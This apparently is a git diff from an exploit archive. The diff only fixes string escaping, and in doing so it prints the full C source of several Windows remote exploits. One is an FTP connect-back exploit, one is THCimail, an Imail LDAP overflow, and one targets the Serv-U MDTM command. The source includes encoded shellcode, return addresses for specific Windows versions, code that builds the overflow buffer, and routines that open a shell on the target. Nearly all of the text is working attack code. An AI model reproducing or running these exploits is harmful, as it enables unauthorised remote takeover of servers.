+"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5"
+"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C"
+"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66"
+"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C"
+"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C"
+"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90"
+"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D"
+"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58"
+"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76"
+"\xDA\x15\xDA\x74\xEA\x55\xEA";
 
 // 294 bytes connectback shellcode by lion (xor with 0x93)
 unsigned char cbsc[]=
-\"\\x7A\\x6F\\x93\\x93\\x93\\xCC\\xF7\\x32\\xA3\\x93\\x93\\x93\\x18\\xD3\\x9F\\x18\"
-\"\\xE3\\x8F\\x3E\\x18\\xFB\\x9B\\x18\\x64\\xF9\\x97\\xCA\\x7B\\x0F\\x93\\x93\\x93\"
-\"\\x71\\x6A\\xFB\\xA0\\xA1\\x93\\x93\\xFB\\xE4\\xE0\\xA1\\xCC\\xC7\\x6C\\x85\\x18\"
-\"\\x7B\\xF9\\x97\\xCA\\x7B\\x10\\x93\\x93\\x93\\x71\\x6A\\x12\\x7F\\x03\\x92\\x93\"
-\"\\x93\\xC7\\xFB\\x92\\x92\\x93\\x93\\x6C\\xC5\\x83\\xC3\\xC3\\xC3\\xC3\\xF9\\x92\"
-\"\\xF9\\x91\\x6C\\xC5\\x87\\x18\\x4B\\xFB\\xEC\\x93\\x93\\x92\\xFB\\x91\\x93\\x93\"
-\"\\xA6\\x18\\x5F\\xF9\\x83\\xC2\\xC0\\x6C\\xC5\\x8B\\x16\\x53\\xE6\\xD8\\xA0\\x53\"
-\"\\xFB\\xF0\\xFE\\xF7\\x93\\x1A\\xF5\\xA3\\x10\\x7F\\xC7\\x18\\x6F\\xF9\\x83\\xCA\"
-\"\\x1A\\x97\\x1C\\x71\\x68\\x55\\xD4\\x83\\xD7\\x6D\\xD4\\xAF\\x6D\\xD4\\xAE\\x1A\"
-\"\\xCC\\xDB\\x1A\\xCC\\xDF\\x1A\\xCC\\xC3\\x1E\\xD7\\xB7\\x83\\xC4\\xC3\\xC2\\xC2\"
-\"\\xC2\\xF9\\x92\\xC2\\xC2\\x6C\\xE5\\xA3\\xC2\\x6C\\xC5\\x97\\x18\\x5F\\xF9\\x6C\"
-\"\\x6C\\xA2\\x6C\\xC5\\x9B\\xC0\\x6C\\xC5\\x8F\\x6C\\xC5\\x9F\\xC2\\xC5\\x18\\xE6\"
-\"\\xAF\\x18\\xE7\\xBD\\xEB\\x90\\x66\\xC5\\x18\\xE5\\xB3\\x90\\x66\\xA0\\x5A\\xDA\"
-\"\\xD2\\x3E\\x90\\x56\\xA0\\x48\\x9C\\x2D\\x83\\xA9\\x45\\xE7\\x9B\\x52\\x58\\x9E\"
-\"\\x90\\x49\\xD3\\x78\\x62\\xA8\\x8C\\xE6\\x74\\xCD\\x18\\xCD\\xB7\\x90\\x4E\\xF5\"
-\"\\x18\\x9F\\xD8\\x18\\xCD\\x8F\\x90\\x4E\\x18\\x97\\x18\\x90\\x56\\x38\\xCD\\xCA\"
-\"\\x50\\x7B\\x6C\\x6D\\x6C\\x6C\\x1D\\xDD\\x9D\\x7F\\xE1\\x6D\\x20\\x85\\x3E\\x4A\"
-\"\\x96\\x5D\\xED\\x4B\\x71\\xE0\\x58\\x7E\\x6F\\xA8\\x4A\\x9A\\x66\\x3E\\x7F\\x6A\"
-\"\\x39\\xF3\\x74\\xEA\\x55\\xEA\";
+"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
+"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93"
+"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
+"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
+"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
+"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93"
+"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53"
+"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA"
+"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A"
+"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2"
+"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C"
+"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6"
+"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
+"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E"
+"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5"
+"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA"
+"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A"
+"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A"
+"\x39\xF3\x74\xEA\x55\xEA";
 
 void usage(char *p)
 {
 	int	i;
-	printf( \"Usage:\\t%s\\t<-i ip> <-t type>\\n\"
-		\"\\t\\t[-u user] [-p pass] [-d dir]\\n\"
-		\"\\t\\t[-f ftpport] [-c cbhost] [-s shellport]\\n\\n\"
-		\"[type]:\\n\" , p);	
+	printf( "Usage:\t%s\t<-i ip> <-t type>\n"
+		"\t\t[-u user] [-p pass] [-d dir]\n"
+		"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
+		"[type]:\n" , p);	
 	for(i=0;i=sizeof(targets)/sizeof(v)) )
 	{
 		usage(argv[0]);
-		printf(\"[-] Invalid type.\\n\");
+		printf("[-] Invalid type.\n");
 		return;
 	}
 
 	if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
 	{
 		usage(argv[0]);
-		printf(\"[-] Invalid port.\\n\");
+		printf("[-] Invalid port.\n");
 		return;
 	}
 	
-	_snprintf(user, sizeof(user)-1, \"USER %s\\r\\n\", pUser);
-	user[sizeof(user)-1]=\'\\0\';
-	_snprintf(pass, sizeof(pass)-1, \"PASS %s\\r\\n\", pPass);
-	pass[sizeof(pass)-1]=\'\\0\';
+	_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
+	user[sizeof(user)-1]='\0';
+	_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
+	pass[sizeof(pass)-1]='\0';
 	szSend[0] = user;	//user
 	szSend[1] = pass;	//pass	
 	szSend[2] = penetrate;	//pentrate
@@ -306,21 +306,21 @@ void main(int argc, char **argv)
 		strncpy(cbHost2, cbHost, 20);
 		for(i=0;i= sizeof(szCommand))
 	{
-		printf(\"[-] stack buffer overflow.\\n\");
+		printf("[-] stack buffer overflow.\n");
 		return;
 	}
 	
-//	printf(\"send size %d:%s\", strlen(szCommand), szCommand);
+//	printf("send size %d:%s", strlen(szCommand), szCommand);
 	
 	__try
 	{
 		if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
 		{
-			printf(\"[-] WSAStartup error:%d\\n\", WSAGetLastError());
+			printf("[-] WSAStartup error:%d\n", WSAGetLastError());
 			__leave;
 		}
 
 		s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 		if(s == INVALID_SOCKET)
 		{
-			printf(\"[-] Create socket failed:%d\",GetLastError());
+			printf("[-] Create socket failed:%d",GetLastError());
 			__leave;
 		}
 
@@ -399,10 +399,10 @@ void main(int argc, char **argv)
 		iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
 		if(iErr == SOCKET_ERROR)
 		{
-			printf(\"[-] Connect to %s:%d error:%d\\n\", ip, iPort, GetLastError());
+			printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
 			__leave;
 		}
-		printf(\"[+] Connect to %s:%d success.\\n\", ip, iPort);
+		printf("[+] Connect to %s:%d success.\n", ip, iPort);
 		
 		if(bCb)
 		{
@@ -421,15 +421,15 @@ void main(int argc, char **argv)
 
 			if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
 			{
-				printf(\"[-] Bind port on %s:%d error.\\n\", cbHost, shport);
-				printf(\"[-] You must run nc get the shell.\\n\");
+				printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
+				printf("[-] You must run nc get the shell.\n");
 				bLocal = FALSE;
 				//closesocket(s2);
 				//__leave;
 			}
 			else
 			{	
-				printf(\"[+] Bind port on %s:%d success.\\n\", cbHost, shport);
+				printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
 				listen(s2, 1); 
 			}
 		}
@@ -440,51 +440,51 @@ void main(int argc, char **argv)
 			iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
 			if(iErr == SOCKET_ERROR)
 			{
-				printf(\"[-] Recv buffer error:%d.\\n\", WSAGetLastError());
+				printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
 				__leave;
 			}
-			printf(\"[+] Recv: %s\", szRecvBuff);
+			printf("[+] Recv: %s", szRecvBuff);
 			
-			if(szRecvBuff[0] == \'5\')
+			if(szRecvBuff[0] == '5')
 			{
-				printf(\"[-] Server return a error Message.\\r\\n\");
+				printf("[-] Server return a error Message.\r\n");
 				__leave;
 			}
 
 			iErr = send(s, szSend[i], strlen(szSend[i]),0);
 			if(iErr == SOCKET_ERROR)
 			{
-				printf(\"[-] Send buffer error:%d.\\n\", WSAGetLastError());
+				printf("[-] Send buffer error:%d.\n", WSAGetLastError());
 				__leave;
 			}
 
 			if(i==sizeof(szSend)/sizeof(szSend[0])-1)
-				printf(\"[+] Send shellcode %d bytes.\\n\", iErr);
+				printf("[+] Send shellcode %d bytes.\n", iErr);
 			else
-				printf(\"[+] Send: %s\", szSend[i]);
+				printf("[+] Send: %s", szSend[i]);
 		}
 
-		printf(\"[+] If you don\'t have a shell it didn\'t work.\\n\");
+		printf("[+] If you don't have a shell it didn't work.\n");
 
 		if(bCb)
 		{
 			if(bLocal)
 			{
-				printf(\"[+] Wait for shell...\\n\");
+				printf("[+] Wait for shell...\n");
 			
 				len = sizeof(client);
 				s3 = accept(s2, (struct sockaddr*)&client, &len); 
 				if(s3 != INVALID_SOCKET) 
 				{ 
-	printf(\"[+] Exploit success! Good luck! :)\\n\");
-	printf(\"[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\\n\");
+	printf("[+] Exploit success! Good luck! :)\n");
+	printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
 					shell(s3);
 				}
 			}	
 		}
 		else
 		{
-			printf(\"[+] Connect to shell...\\n\");
+			printf("[+] Connect to shell...\n");
 			
 			Sleep(1000);
 			s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
@@ -495,12 +495,12 @@ void main(int argc, char **argv)
 			ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
 			if(ret!=0)
 			{
-				printf(\"[-] Exploit seem failed.\\n\");
+				printf("[-] Exploit seem failed.\n");
 				__leave;
 			}
 			
-	printf(\"[+] Exploit success! Good luck! :)\\n\");
-	printf(\"[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\\n\");
+	printf("[+] Exploit success! Good luck! :)\n");
+	printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
 			shell(s2);
 		}
 		
diff --git a/platforms/windows/remote/157.c b/platforms/windows/remote/157.c
index 17b0d4331..2fd4bc0cf 100755
--- a/platforms/windows/remote/157.c
+++ b/platforms/windows/remote/157.c
@@ -17,40 +17,40 @@
 #include 
 #include 
 
-#pragma comment(lib, \"ws2_32.lib\")
+#pragma comment(lib, "ws2_32.lib")
 
-char *WIN2KEN = \"\\xc4\\x2a\\x02\\x75\";
-char *WIN2KPG = \"\\xc4\\x2a\\xf9\\x74\";
-char *WINXPSP1G = \"\\xfe\\x63\\xa1\\x71\";
+char *WIN2KEN = "\xc4\x2a\x02\x75";
+char *WIN2KPG = "\xc4\x2a\xf9\x74";
+char *WINXPSP1G = "\xfe\x63\xa1\x71";
 
-#define jumper \"\\xeb\\x06\\x4a\\x43\"
+#define jumper "\xeb\x06\x4a\x43"
 
-char ldapshit[] = \"\\x30\\x82\\x0a\\x3d\\x02\\x01\\x01\\x60\\x82\\x01\\x36\\x02\\xff\\xff\\xff\\xff\\x20\";
+char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";
 
 char shellcode[] =
-\"\\x8b\\x7c\\x24\\xfc\\x83\\xc7\\x21\\x33\\xc9\\xb2\\x8f\\x66\\x81\\xc1\\x02\"
-\"\\x02\\x8a\\x1f\\x32\\xda\\x88\\x1f\\x47\\xe2\\xf7\\x64\\xac\\xf5\\xe6\\x8d\"
-\"\\x8a\\xe3\\xd6\\x77\\x92\\x13\\x51\\x03\\x5e\\xc3\\xff\\x5b\\x8c\\x7f\\xa8\"
-\"\\xaf\\xaf\\xbf\\x87\\xd8\\xdc\\xbd\\xd0\\xbc\\xbd\\xa1\\xcb\\xc3\\xc3\\x8e\"
-\"\\x64\\x8a\\x67\\x76\\x70\\x70\\x70\\xd2\\x0c\\x62\\xa5\\xe5\\xbf\\xd6\\xeb\"
-\"\\x04\\x8e\\x04\\xcf\\x83\\x04\\xff\\x93\\x22\\x04\\xf7\\x87\\x02\\xd0\\xb3\"
-\"\\x04\\x94\\x8e\\x74\\x04\\xd4\\xf7\\x8e\\x74\\x04\\xc4\\x93\\x8e\\x76\\x04\"
-\"\\xdc\\xab\\x8e\\x75\\xdc\\xde\\xdd\\x04\\xd4\\xaf\\x8e\\x74\\xbe\\x46\\xce\"
-\"\\xbe\\x4f\\x16\\x04\\xbb\\x04\\x8e\\x71\\x23\\xbe\\x4d\\x5e\\x6d\\x0b\\x4f\"
-\"\\xfa\\x78\\x80\\x39\\xca\\x8a\\x02\\xcb\\xca\\x8b\\xe9\\xb6\\x9f\\xfa\\x6e\"
-\"\\xe9\\xbe\\x9f\\xd5\\xd7\\xd1\\xd9\\xdf\\xdd\\xa4\\xc1\\x9f\\xce\\x80\\x38\"
-\"\\x83\\xc5\\x04\\x8b\\x07\\x8e\\x77\\x80\\x39\\xc2\\x8a\\x06\\xcb\\x02\\x57\"
-\"\\x71\\xc2\\x8a\\xfa\\x31\\x71\\xc2\\x8b\\xfb\\xae\\x71\\xc2\\xad\\x02\\xd2\"
-\"\\x97\\xdc\\x70\\x5f\\x06\\x48\\xe5\\x8b\\xd7\\x07\\xca\\x8a\\x0f\\xca\\xf8\"
-\"\\x85\\x02\\xd2\\xfb\\x0f\\xe4\\xa9\\x9b\\x66\\xf7\\x70\\x70\\x70\\x06\\x41\"
-\"\\xbe\\x54\\xdc\\xdc\\xdc\\xdc\\xd9\\xc9\\xd9\\x70\\x5f\\x18\\xda\\xd7\\xe9\"
-\"\\x06\\xbf\\xe5\\x9f\\xda\\xd8\\x70\\xda\\x5b\\xc1\\xd9\\xd8\\x70\\xda\\x43\"
-\"\\xdc\\xda\\xd8\\x70\\xda\\x5f\\x18\\x02\\xca\\x07\\xdf\\x70\\xda\\x6b\\xda\"
-\"\\xda\\x70\\xda\\x67\\x02\\xcb\\x8a\\x83\\x1b\\xdc\\xe7\\xa1\\xea\\xf7\\xea\"
-\"\\xe7\\xd3\\xec\\xe2\\xeb\\x1b\\xbe\\x5d\\x02\\xca\\x43\\x1b\\xd8\\xd8\\xd8\"
-\"\\xdc\\xdc\\x71\\x49\\x8e\\x7d\\xdd\\x1b\\x02\\xca\\xf7\\xdf\\x02\\xca\\x07\"
-\"\\xdf\\x3e\\x87\\xdc\\xdc\\xe5\\x9f\\x71\\x41\\xdd\\xdc\\xdc\\xdc\\xda\\x70\"
-\"\\xda\\x63\\xe5\\x70\\x70\\xda\\x6f\";
+"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
+"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
+"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
+"\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
+"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
+"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
+"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
+"\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
+"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
+"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
+"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
+"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
+"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
+"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
+"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
+"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
+"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
+"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
+"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
+"\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
+"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
+"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
+"\xda\x63\xe5\x70\x70\xda\x6f";
 
 
 void usage();
@@ -67,9 +67,9 @@ struct sockaddr_in mytcp;
 struct hostent * hp;
 WSADATA wsaData;
 
-printf(\"\\nTHCimail v0.1 - Imail LDAP exploit\\n\");
-printf(\"tested on Imail 6-8\\n\");
-printf(\"by Johnny Cyberpunk (jcyberpunk@thc.org)\\n\");
+printf("\nTHCimail v0.1 - Imail LDAP exploit\n");
+printf("tested on Imail 6-8\n");
+printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
 
 if(argc<4 || argc>4)
 usage();
@@ -84,23 +84,23 @@ case 1:
 IMAILVER = IMAIL_8;
 break;
 default:
-printf(\"\\nYou entered an illegal version !\\n\\n\");
+printf("\nYou entered an illegal version !\n\n");
 usage();
 exit(-1);
 }
 
 crapbuf1 = malloc(IMAILVER);
-memset(crapbuf1,\'X\',IMAILVER);
+memset(crapbuf1,'X',IMAILVER);
 
-printf(\"imailver = %d\\n\",IMAILVER);
+printf("imailver = %d\n",IMAILVER);
 
 crapbuf2 = malloc(2220);
-memset(crapbuf2,\'X\',2220);
+memset(crapbuf2,'X',2220);
 
 finalbuffer = malloc(2650);
 memset(finalbuffer,0,2650);
 
-printf(\"\\n[*] building buffer\\n\");
+printf("\n[*] building buffer\n");
 
 strcat(finalbuffer,ldapshit);
 
@@ -121,7 +121,7 @@ case 2:
 strcat(finalbuffer,WINXPSP1G);
 break;
 default:
-printf(\"\\nYou entered an illegal OS !\\n\\n\");
+printf("\nYou entered an illegal OS !\n\n");
 usage();
 exit(-1);
 }
@@ -131,7 +131,7 @@ strcat(finalbuffer,crapbuf2);
 
 if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
 {
-printf(\"WSAStartup failed !\\n\");
+printf("WSAStartup failed !\n");
 exit(-1);
 }
 
@@ -142,14 +142,14 @@ addr = inet_addr(argv[1]);
 }
 if ((!hp) && (addr == INADDR_NONE) )
 {
-printf(\"Unable to resolve %s\\n\",argv[1]);
+printf("Unable to resolve %s\n",argv[1]);
 exit(-1);
 }
 
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 if (!sock)
 { 
-printf(\"socket() error...\\n\");
+printf("socket() error...\n");
 exit(-1);
 }
 
@@ -165,27 +165,27 @@ mytcp.sin_family = AF_INET;
 
 mytcp.sin_port=htons(389);
 
-printf(\"[*] connecting the target\\n\");
+printf("[*] connecting the target\n");
 
 rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
 if(rc==0)
 {
 send(sock,finalbuffer,2650,0);
-printf(\"[*] Exploit send successfully ! Sleeping a while ....\\n\");
+printf("[*] Exploit send successfully ! Sleeping a while ....\n");
 Sleep(1000);
 }
 else
-printf(\"\\nCan\'t connect to ldap port!\\n\");
+printf("\nCan't connect to ldap port!\n");
 
 if(rc==0)
 {
-printf(\"[*] Trying to get a shell\\n\\n\");
+printf("[*] Trying to get a shell\n\n");
 sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 mytcp.sin_port = htons(31337);
 rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
 if(rc!=0)
 {
-printf(\"can\'t connect to port 31337 ;( maybe firewalled ...\\n\");
+printf("can't connect to port 31337 ;( maybe firewalled ...\n");
 exit(-1);
 }
 shell(sock2);
@@ -204,15 +204,15 @@ exit(0);
 void usage()
 {
 unsigned int a;
-printf(\"\\nUsage:   \\n\");
-printf(\"Sample: THCimail 194.44.55.56 0 1\\n\\n\");
-printf(\"OS:\\n\");
-printf(\"0 - Windows 2000 Server english all service packs\\n\");
-printf(\"1 - Windows 2000 Professional german\\n\");
-printf(\"2 - Windows XP SP1 german\\n\\n\");
-printf(\"Imail Version:\\n\");
-printf(\"0 - Imail 6+7\\n\");
-printf(\"1 - Imail 8\\n\");
+printf("\nUsage:   \n");
+printf("Sample: THCimail 194.44.55.56 0 1\n\n");
+printf("OS:\n");
+printf("0 - Windows 2000 Server english all service packs\n");
+printf("1 - Windows 2000 Professional german\n");
+printf("2 - Windows XP SP1 german\n\n");
+printf("Imail Version:\n");
+printf("0 - Imail 6+7\n");
+printf("1 - Imail 8\n");
 exit(0);
 }
 
@@ -237,13 +237,13 @@ if(l == 1)
 l = recv (sock, buf, sizeof (buf), 0);
 if (l <= 0)
 {
-printf (\"bye bye...\\n\");
+printf ("bye bye...\n");
 return;
 }
 l = write (1, buf, l);
 if (l <= 0)
 {
-printf (\"bye bye...\\n\");
+printf ("bye bye...\n");
 return;
 }
 }
@@ -252,13 +252,13 @@ else
 l = read (0, buf, sizeof (buf));
 if (l <= 0)
 {
-printf(\"bye bye...\\n\");
+printf("bye bye...\n");
 return;
 }
 l = send(sock, buf, l, 0);
 if (l <= 0)
 {
-printf(\"bye bye...\\n\");
+printf("bye bye...\n");
 return;
 }
 }
diff --git a/platforms/windows/remote/158.c b/platforms/windows/remote/158.c
index fe6d9f6ae..d8554a34f 100755
--- a/platforms/windows/remote/158.c
+++ b/platforms/windows/remote/158.c
@@ -1,4 +1,4 @@
-/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x \"MDTM\" Command remote overflow exploit
+/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit
 *
 * Copyright (c) SST 2004 All rights reserved.
 *
@@ -42,12 +42,12 @@
 *  Microsoft Windows XP [Version 5.1.2600]
 *  (C) Copyright 1985-2001 Microsoft Corp.
 *
-*  [Sam Chen@SAM C:\\]#
+*  [Sam Chen@SAM C:\]#
 *
 *
 * some thanks/greets to:
 * bkbll (he find this bug :D), airsupply, kkqq, icbm
-* and everyone else who\'s KNOW SST;P
+* and everyone else who's KNOW SST;P
 * http://0x557.org
 */
 
@@ -67,7 +67,7 @@
 #include 
 #include 
 
-#define VER \"v5.0\"
+#define VER "v5.0"
 
 #define clearbit(buff)          bzero(buff, sizeof (buff));
 #define padding(buff, a)        memset(buff, a, sizeof (buff));
@@ -86,28 +86,28 @@ struct archs {
 
 
        {
-               \"Serv-U v3.x/4.x/5.x  with Windows 2K CN\",   //winmm.dll
+               "Serv-U v3.x/4.x/5.x  with Windows 2K CN",   //winmm.dll
                0x77535985
 
        },
         {
-               \"Serv-U v3.x/4.x/5.x  with Windows 2K BIG5 version\",   //winmm.dll
+               "Serv-U v3.x/4.x/5.x  with Windows 2K BIG5 version",   //winmm.dll
                 0x77531790
 
        },
        {
-               \"Serv-U v3.x/4.x/5.x  with Windows 2K EN\",
+               "Serv-U v3.x/4.x/5.x  with Windows 2K EN",
                0x77575985
 
        },
 
        {
-               \"Serv-U v3.x/4.x/5.x  with Windows XP CN SP1\",
+               "Serv-U v3.x/4.x/5.x  with Windows XP CN SP1",
                0x76b12f69
 
        },
        {
-               \"Serv-U v3.x/4.x/5.x  with Windows XP EN SP1\",
+               "Serv-U v3.x/4.x/5.x  with Windows XP EN SP1",
                0x76b42a3a
 
 }
@@ -117,62 +117,62 @@ struct archs {
 char decoder [] =
 /* 36 bytes cool decoder by airsupply :) */
 
-\"\\x90\\x90\\x90\\x5E\\x5F\\x5B\\xBE\\x52\\x52\\x49\\x41\\x46\\xBF\\x52\\x52\\x31\"
-\"\\x41\\x47\\x43\\x39\\x3B\\x75\\xFB\\x4B\\x80\\x33\\x99\\x39\\x73\\xFC\\x75\\xF7\"
-\"\\xFF\\xD3\\x90\\x90\";
+"\x90\x90\x90\x5E\x5F\x5B\xBE\x52\x52\x49\x41\x46\xBF\x52\x52\x31"
+"\x41\x47\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7"
+"\xFF\xD3\x90\x90";
 
 /* fork + rebind shellcode  by airsupply (one way shellcode) */
 char    shellcode [] =
 
-\"\\x53\\x52\\x49\\x41\"
+"\x53\x52\x49\x41"
 
 /*port offset 120 + 4*/
-\"\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xD9\\x85\\x12\\x99\\x12\\xD9\"
-\"\\x91\\x18\\x75\\x19\\x98\\x99\\x99\\x12\\x65\\x12\\x76\\x32\\x70\\x8B\\x9B\\x99\"
-\"\\x99\\xC7\\xAA\\x50\\x28\\x90\\x66\\xEE\\x65\\x71\\xB9\\x98\\x99\\x99\\xF1\\xF5\"
-\"\\xF5\\x99\\x99\\xF1\\xAA\\xAB\\xB7\\xFD\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\xCC\"
-\"\\x9D\\x32\\xAA\\x50\\x28\\x9C\\x66\\xEE\\x65\\x71\\x99\\x98\\x99\\x99\\x12\\x6C\"
-\"\\x71\\x94\\x98\\x99\\x99\\xAA\\x66\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\"
-\"\\x98\\x99\\x99\\x66\\xCF\\xB5\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\"
-\"\\xA9\\x12\\x41\\xCE\\xCE\\xF1\\x9B\\x99\\x8C\\x5B\\x12\\x55\\xCA\\xC8\\xF3\\x8F\"
-\"\\xC8\\xCA\\x66\\xCF\\xAD\\xC0\\xC2\\x1C\\x59\\xEC\\x68\\xCE\\xCA\\x66\\xCF\\xA1\"
-\"\\xCE\\xC8\\xCA\\x66\\xCF\\xA5\\x12\\x49\\x10\\x1F\\xD9\\x98\\x99\\x99\\xF1\\xFC\"
-\"\\xE1\\xFC\\x99\\xF1\\xFA\\xF4\\xFD\\xB7\\x10\\x3F\\xA9\\x98\\x99\\x99\\x1A\\x75\"
-\"\\xCD\\x14\\xA5\\xBD\\xAA\\x59\\xAA\\x50\\x1A\\x58\\x8C\\x32\\x7B\\x64\\x5F\\xDD\"
-\"\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA5\\x67\\xDD\\xBD\\xA4\\x10\\xCD\\xBD\\xD1\\x10\"
-\"\\xCD\\xBD\\xD5\\x10\\xCD\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\x14\\x27\\xDD\\x98\\x99\"
